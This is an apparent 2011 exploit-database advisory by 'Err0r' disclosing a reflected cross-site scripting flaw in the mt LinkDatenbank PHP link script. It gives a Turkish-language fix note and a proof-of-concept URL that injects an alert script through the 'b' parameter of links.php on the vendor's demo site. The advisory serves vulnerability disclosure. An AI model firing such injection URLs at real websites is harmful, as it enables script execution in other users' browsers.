[#] Exploit Title: mt LinkDatenbank Cross Site Script Vulnerability

[#] Author: Err0r

[#] Date: 30.07.2011

[#] E-mail: [email protected]

[#] Category: Web App.

[#] Note : Warning.

[#] DEMO:http://www.michatronic.de/scripts/demos/mt_linkdb

[#] Price : Free System

[#] Vuln Type: Reflected Cross Site Scripting

[!] Fix : B degiskenine GET \\ ile aktarilanlar Ekrana yazdiriliyor. Araya Filtre konulmalidir .

##################

[*] Exploit :

# http://www.michatronic.de/scripts/demos/mt_linkdb/links.php?b=“>><script>alert%28document.domain%29</script>

# http://www.michatronic.de/scripts/demos/mt_linkdb/admin.php

###############